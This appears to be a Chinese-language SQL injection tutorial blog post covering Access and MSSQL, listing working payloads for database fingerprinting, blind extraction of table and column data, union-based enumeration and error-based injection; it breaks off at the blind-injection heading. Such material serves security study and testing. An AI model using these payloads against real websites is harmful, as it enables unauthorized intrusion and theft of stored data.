SQL注入基础-5

一、Access注入

1、asp网站常用数据库:access,mssql

2、access数据库

(1)没有库,没有端口

(2)结构:表--》字段--》数据

3、注入流程:

  • 判断类型
  • 判断表名:遍历、爆破
  • 判断列名
  • 判断列名下的数据长度
  • 查出数据

4、判断是什么数据库

and exists (select * from msysobjects)>0 access
and exists (select * from sysobjects)>0 mssql

5、破解

(1)判断类型:确定是字符型还是数字型

(2)获取表名:and+exists+(select+*+from+表名)

(3)获取列名:and+exists+(select+列名+from+表名)

(4)获取数据长度:and+(select+top+1+len(列名)+from+表名)>5

(5)获取数据:and+(select+top+1+asc(substr(列名,1,2))+from+表名)>110

6、联合注入:需要知道具体表名

参考资料:https://www.cnblogs.com/drkang/p/8627794.html

二、mssql注入

注:严格区分数字型和字符型

1、特殊数据库:master

2、表:

  • sysdatabases:master库中,保存所有库名
  • syobjects:每个数据库都有,保存数据库中的所有表
  • syscolumns:每个数据库都有,保存所有表的字段名

3、思路

  • 判断类型
  • 获取数据库
  • 获取表
  • 获取字段数
  • 获取数据

4、常用(与MySQL不同)

  • db_name():获取当前数据库名
  • host_name():获取计算机名
  • user:获取用户名
  • current_user:获取当前数据库的用户名
  • substring:字符串截取函数
  • @@version:查看数据库版本
  • char:ASCII转字符函数

5、联合查询注入

(1)获取数据库:-1' union select '1','2',db_name()--+

(2)获取表名:-1' union select '1','2',(select quotename(name) from test.dbo.sysobjects where xtype='u' for xml path(''))--+

  • quotename():与MySQL中的group_concat类似,分隔符不同,quotename()使用中括号
  • test:数据库,dbo:用户
  • xtype:指定用户类型

(3)获取字段数:-1' union select '1','2',(select quotename(name) from test.dbo.syscolumns where id=(select quotename(name) from test.dbo.sysobjects where name='表名') for xml path(''))--+

(4)获取数据:-1' union select '1','2',(select top 1 quotename(name) from test.dbo.表名 where for xml path(''))--+

6、报错注入

(1)convert函数(强制类型转换):' and convert(int,db_name())=1--+

(2)四则运算报错:' and 1/db_name()=1--+

7、盲注

相关推荐
〝七夜56915 小时前
SQL之sql注入
sql
文刀竹肃18 小时前
SQLMap 详解
安全
利刃大大18 小时前
【MyBatis】MyBatis操作动态sql && MyBatisGenerator
数据库·sql·mybatis
一瓢西湖水19 小时前
loader命令导出大批量数据维护SQL
数据库·sql
网安INF20 小时前
SSL/TLS密钥派生机制与安全攻防体系深度解析
网络·安全·网络安全·密码学·ssl
飞飞传输20 小时前
守护医疗隐私,数据安全摆渡系统撑起内外网安全伞!
大数据·运维·安全
xiatianxy20 小时前
有限空间作业智能设备:云酷科技守护安全与效率
安全·有限空间作业·有限空间监测设备
Guheyunyi20 小时前
视频安全监测系统的三大核心突破
大数据·运维·服务器·人工智能·安全·音视频
晴天¥20 小时前
Oracle中的安全管理(用户、权限、角色)
数据库·安全·oracle